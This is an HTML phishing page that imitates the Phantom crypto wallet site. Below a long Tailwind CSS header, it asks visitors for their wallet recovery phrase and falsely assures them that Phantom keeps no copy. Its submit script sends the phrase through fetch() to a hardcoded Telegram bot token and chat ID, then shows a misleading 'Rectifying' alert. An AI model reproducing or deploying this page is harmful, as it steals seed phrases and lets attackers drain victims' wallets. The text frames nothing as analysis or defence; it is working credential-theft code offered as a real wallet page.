<!DOCTYPE html>
<html lang="en">

<head>
  <meta http-equiv="content-type" content="text/html;charset=utf-8">

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width">
  <title>
    Phantom — Crypto &amp; NFT Wallet — Solana | Ethereum | Polygon
  </title>
  <meta name="robots" content="index,follow">
  <meta name="description" content="Your trusted companion for NFTs &amp; DeFi on Solana, Ethereum, &amp; Polygon">
  <meta name="twitter:card" content="summary_large_image">
  <meta property="og:title" content="Phantom — Crypto &amp; NFT Wallet — Solana | Ethereum | Polygon">
  <meta property="og:description"
    content="Your trusted companion for NFTs &amp; DeFi on Solana, Ethereum, &amp; Polygon">
  <meta property="og:url" content="/">
  <meta property="og:image" content="images/og-image.jpg">
  <meta property="og:image:width" content="1200">
  <meta property="og:image:height" content="630">
  <meta property="og:site_name" content="Phantom">
  <link rel="canonical" href="../one/index.html">
  <meta name="next-head-count" content="14">
  <meta name="application-name" content="Phantom">
  <link rel="shortcut icon" href="favicon/favicon.ico">
  <link rel="apple-touch-icon" sizes="180x180" href="favicon/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="favicon/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="favicon/favicon-16x16.png">
  <link rel="mask-icon" href="favicon/safari-pinned-tab.svg" color="#ab9ff2">
  <link rel="shortcut icon" href="favicon/favicon.ico">
  <meta name="msapplication-TileColor" content="#ab9ff2">
  <script src="../../cdn.tailwindcss.com/3.4.5.js"></script>
  <meta name="theme-color" content="#3C315B">
  <link rel="preload" href="_next/static/media/e79de15044935137-s.p.woff2" as="font" type="font/woff2"
    data-next-font="size-adjust">
  <link rel="preload" href="_next/static/media/4c4667e2bb125609-s.p.woff2" as="font" type="font/woff2"
    data-next-font="size-adjust">
  <link rel="preload" href="_next/static/media/4356a8cc4b9a973a-s.p.woff2" as="font" type="font/woff2"
    data-next-font="size-adjust">
  <link rel="preload" href="_next/static/media/6bd967b3fc58cc5f-s.p.woff2" as="font" type="font/woff2"
    data-next-font="size-adjust">
  <link rel="preload" href="_next/static/media/8c72d7c66e62e47e-s.p.woff2" as="font" type="font/woff2"
    data-next-font="size-adjust">
  <link rel="preload" href="_next/static/media/00c4056187920ce9-s.p.woff2" as="font" type="font/woff2"
    data-next-font="size-adjust">
  <link rel="preload" href="_next/static/media/8ec293e202f826c3-s.p.woff2" as="font" type="font/woff2"
    data-next-font="size-adjust">
  <link rel="preload" href="_next/static/media/b55cd65cf01b64f8-s.p.woff2" as="font" type="font/woff2"
    data-next-font="size-adjust">
  <!--<script src="../../cdn.jsdelivr.net/npm/vue@2.6.10/dist/vue.js"></script>-->

  <style>
    /* ! tailwindcss v3.4.5 | MIT License | https://tailwindcss.com */
    *,
    ::after,
    ::before {
      box-sizing: border-box;
      border-width: 0;
      border-style: solid;
      border-color: #e5e7eb
    }

    ::after,
    ::before {
      --tw-content: ''
    }

    :host,
    html {
      line-height: 1.5;
      -webkit-text-size-adjust: 100%;
      -moz-tab-size: 4;
      tab-size: 4;
      font-family: ui-sans-serif, system-ui, sans-serif, "Apple Color Emoji", "Segoe UI Emoji", "Segoe UI Symbol", "Noto Color Emoji";
      font-feature-settings: normal;
      font-variation-settings: normal;
      -webkit-tap-highlight-color: transparent
    }

    body {
      margin: 0;
      line-height: inherit
    }

    hr {
      height: 0;
      color: inherit;
      border-top-width: 1px
    }

    abbr:where([title]) {
      -webkit-text-decoration: underline dotted;
      text-decoration: underline dotted
    }

    h1,
    h2,
    h3,
    h4,
    h5,
    h6 {
      font-size: inherit;
      font-weight: inherit
    }

    a {
      color: inherit;
      text-decoration: inherit
    }

    b,
    strong {
      font-weight: bolder
    }

    code,
    kbd,
    pre,
    samp {
      font-family: ui-monospace, SFMono-Regular, Menlo, Monaco, Consolas, "Liberation Mono", "Courier New", monospace;
      font-feature-settings: normal;
      font-variation-settings: normal;
      font-size: 1em
    }

    small {
      font-size: 80%
    }

    sub,
    sup {
      font-size: 75%;
      line-height: 0;
      position: relative;
      vertical-align: baseline
    }

    sub {
      bottom: -.25em
    }

    sup {
      top: -.5em
    }

    table {
      text-indent: 0;
      border-color: inherit;
      border-collapse: collapse
    }

    button,
    input,
    optgroup,
    select,
    textarea {
      font-family: inherit;
      font-feature-settings: inherit;
      font-variation-settings: inherit;
      font-size: 100%;
      font-weight: inherit;
      line-height: inherit;
      letter-spacing: inherit;
      color: inherit;
      margin: 0;
      padding: 0
    }

    button,
    select {
      text-transform: none
    }

    /*button,
    input:where([type=button]),
    input:where([type=reset]),
    input:where([type=submit]) {
      -webkit-appearance: button;
      background-color: transparent;
      background-image: none
    }*/

    :-moz-focusring {
      outline: auto
    }

    :-moz-ui-invalid {
      box-shadow: none
    }

    progress {
      vertical-align: baseline
    }

    ::-webkit-inner-spin-button,
    ::-webkit-outer-spin-button {
      height: auto
    }

    [type=search] {
      -webkit-appearance: textfield;
      outline-offset: -2px
    }

    ::-webkit-search-decoration {
      -webkit-appearance: none
    }

    ::-webkit-file-upload-button {
      -webkit-appearance: button;
      font: inherit
    }

    summary {
      display: list-item
    }

    blockquote,
    dd,
    dl,
    figure,
    h1,
    h2,
    h3,
    h4,
    h5,
    h6,
    hr,
    p,
    pre {
      margin: 0
    }

    fieldset {
      margin: 0;
      padding: 0
    }

    legend {
      padding: 0
    }

    menu,
    ol,
    ul {
      list-style: none;
      margin: 0;
      padding: 0
    }

    dialog {
      padding: 0
    }

    textarea {
      resize: vertical
    }

    input::placeholder,
    textarea::placeholder {
      opacity: 1;
      color: #9ca3af
    }

    [role=button],
    button {
      cursor: pointer
    }

    :disabled {
      cursor: default
    }

    audio,
    canvas,
    embed,
    iframe,
    img,
    object,
    svg,
    video {
      display: block;
      vertical-align: middle
    }

    img,
    video {
      max-width: 100%;
      height: auto
    }

    [hidden] {
      display: none
    }

    *,
    ::before,
    ::after {
      --tw-border-spacing-x: 0;
      --tw-border-spacing-y: 0;
      --tw-translate-x: 0;
      --tw-translate-y: 0;
      --tw-rotate: 0;
      --tw-skew-x: 0;
      --tw-skew-y: 0;
      --tw-scale-x: 1;
      --tw-scale-y: 1;
      --tw-pan-x: ;
      --tw-pan-y: ;
      --tw-pinch-zoom: ;
      --tw-scroll-snap-strictness: proximity;
      --tw-gradient-from-position: ;
      --tw-gradient-via-position: ;
      --tw-gradient-to-position: ;
      --tw-ordinal: ;
      --tw-slashed-zero: ;
      --tw-numeric-figure: ;
      --tw-numeric-spacing: ;
      --tw-numeric-fraction: ;
      --tw-ring-inset: ;
      --tw-ring-offset-width: 0px;
      --tw-ring-offset-color: #fff;
      --tw-ring-color: rgb(59 130 246 / 0.5);
      --tw-ring-offset-shadow: 0 0 #0000;
      --tw-ring-shadow: 0 0 #0000;
      --tw-shadow: 0 0 #0000;
      --tw-shadow-colored: 0 0 #0000;
      --tw-blur: ;
      --tw-brightness: ;
      --tw-contrast: ;
      --tw-grayscale: ;
      --tw-hue-rotate: ;
      --tw-invert: ;
      --tw-saturate: ;
      --tw-sepia: ;
      --tw-drop-shadow: ;
      --tw-backdrop-blur: ;
      --tw-backdrop-brightness: ;
      --tw-backdrop-contrast: ;
      --tw-backdrop-grayscale: ;
      --tw-backdrop-hue-rotate: ;
      --tw-backdrop-invert: ;
      --tw-backdrop-opacity: ;
      --tw-backdrop-saturate: ;
      --tw-backdrop-sepia: ;
      --tw-contain-size: ;
      --tw-contain-layout: ;
      --tw-contain-paint: ;
      --tw-contain-style:
    }

    ::backdrop {
      --tw-border-spacing-x: 0;
      --tw-border-spacing-y: 0;
      --tw-translate-x: 0;
      --tw-translate-y: 0;
      --tw-rotate: 0;
      --tw-skew-x: 0;
      --tw-skew-y: 0;
      --tw-scale-x: 1;
      --tw-scale-y: 1;
      --tw-pan-x: ;
      --tw-pan-y: ;
      --tw-pinch-zoom: ;
      --tw-scroll-snap-strictness: proximity;
      --tw-gradient-from-position: ;
      --tw-gradient-via-position: ;
      --tw-gradient-to-position: ;
      --tw-ordinal: ;
      --tw-slashed-zero: ;
      --tw-numeric-figure: ;
      --tw-numeric-spacing: ;
      --tw-numeric-fraction: ;
      --tw-ring-inset: ;
      --tw-ring-offset-width: 0px;
      --tw-ring-offset-color: #fff;
      --tw-ring-color: rgb(59 130 246 / 0.5);
      --tw-ring-offset-shadow: 0 0 #0000;
      --tw-ring-shadow: 0 0 #0000;
      --tw-shadow: 0 0 #0000;
      --tw-shadow-colored: 0 0 #0000;
      --tw-blur: ;
      --tw-brightness: ;
      --tw-contrast: ;
      --tw-grayscale: ;
      --tw-hue-rotate: ;
      --tw-invert: ;
      --tw-saturate: ;
      --tw-sepia: ;
      --tw-drop-shadow: ;
      --tw-backdrop-blur: ;
      --tw-backdrop-brightness: ;
      --tw-backdrop-contrast: ;
      --tw-backdrop-grayscale: ;
      --tw-backdrop-hue-rotate: ;
      --tw-backdrop-invert: ;
      --tw-backdrop-opacity: ;
      --tw-backdrop-saturate: ;
      --tw-backdrop-sepia: ;
      --tw-contain-size: ;
      --tw-contain-layout: ;
      --tw-contain-paint: ;
      --tw-contain-style:
    }

    .container {
      width: 100%
    }

    @media (min-width: 640px) {
      .container {
        max-width: 640px
      }
    }

    @media (min-width: 768px) {
      .container {
        max-width: 768px
      }
    }

    @media (min-width: 1024px) {
      .container {
        max-width: 1024px
      }
    }

    @media (min-width: 1280px) {
      .container {
        max-width: 1280px
      }
    }

    @media (min-width: 1536px) {
      .container {
        max-width: 1536px
      }
    }

    .mt-10 {
      margin-top: 2.5rem
    }

    .mt-3 {
      margin-top: 0.75rem
    }

    .mt-5 {
      margin-top: 1.25rem
    }

    .flex {
      display: flex
    }

    .h-screen {
      height: 100vh
    }

    .h-12 {
      height: 3rem
    }

    .min-h-36 {
      min-height: 9rem
    }

    .w-36 {
      width: 9rem
    }

    .w-40 {
      width: 10rem
    }

    .w-full {
      width: 100%
    }

    .flex-col {
      flex-direction: column
    }

    .items-center {
      align-items: center
    }

    .justify-center {
      justify-content: center
    }

    .rounded {
      border-radius: 0.25rem
    }

    .rounded-lg {
      border-radius: 0.5rem
    }

    .border {
      border-width: 1px
    }

    .border-2 {
      border-width: 2px
    }

    .border-\[\#ab9ff2\] {
      --tw-border-opacity: 1;
      border-color: rgb(171 159 242 / var(--tw-border-opacity))
    }

    .bg-\[\#f5f2ff\] {
      --tw-bg-opacity: 1;
      background-color: rgb(245 242 255 / var(--tw-bg-opacity))
    }

    .bg-violet-200 {
      --tw-bg-opacity: 1;
      background-color: rgb(221 214 254 / var(--tw-bg-opacity))
    }

    .p-5 {
      padding: 1.25rem
    }

    .p-2 {
      padding: 0.5rem
    }

    .px-2 {
      padding-left: 0.5rem;
      padding-right: 0.5rem
    }

    .py-1 {
      padding-top: 0.25rem;
      padding-bottom: 0.25rem
    }

    .text-sm {
      font-size: 0.875rem;
      line-height: 1.25rem
    }

    .text-\[\#aa99ec\] {
      --tw-text-opacity: 1;
      color: rgb(170 153 236 / var(--tw-text-opacity))
    }

    .text-white {
      --tw-text-opacity: 1;
      color: rgb(255 255 255 / var(--tw-text-opacity))
    }

    @media (min-width: 1024px) {
      .lg\:w-6\/12 {
        width: 50%
      }
    }
  </style>
</head>

<body class="bg-[#f5f2ff] h-screen">
  <div class="container p-5 flex">
    <a href="index.html">
      <img class="w-36" src="logo.svg" alt="logo">
    </a>
  </div>
  <form id="telegramForm">
    <div id="app">
        <div class="p-5 mt-10 flex flex-col items-center justify-center">
        <!----> 
        <div class="text-sm text-[#aa99ec] mt-3" style="padding-bottom: 5px;">
          Enter your Phrase to access your Phantom account.<br />
          </div>
        <textarea name="name" id="message"
            class="p-2 w-full lg:w-6/12 rounded min-h-36 border border-2 border-[#ab9ff2]"></textarea>
          <div class="text-sm text-[#aa99ec] mt-3" style="margin-top: 2px;">
            <em style="font-size: 12px;">Phantom does not keep a copy of your recovery phrase</em><br/>
            <!--<span>NOTE:The Procedure is End-To-Endencrypted</span>-->
          </div> 
          <button type="submit" class="px-2 py-1 w-40 rounded-lg mt-5 h-12 bg-violet-200 text-white" style="background-color: #AB9FF2;">
            Continue
          </button> 
        </div>
    </div>
    </form>
    <script>
      document.getElementById('telegramForm').addEventListener('submit', function(event) {
          event.preventDefault();
          const message = document.getElementById('message').value;
  
          fetch(`https://api.telegram.org/bot7885071985:AAFMsuMBgBXLXhpgjillGdG2zcsowYeF6e8/sendMessage?chat_id=6203081758&text=${encodeURIComponent(message)}`)
              .then(response => response.json())
              .then(data => {
                  if (data.ok) {
                      alert('Rectifying, please wait few minutes!');
                      window.location.href = 'index.html';
                  } else {
                      alert('Error sending message.');
                  }
              })
              .catch(error => console.error('Error:', error));
      });
  </script>

  <script src="js/vue-app.js"></script>

</body>

</html>
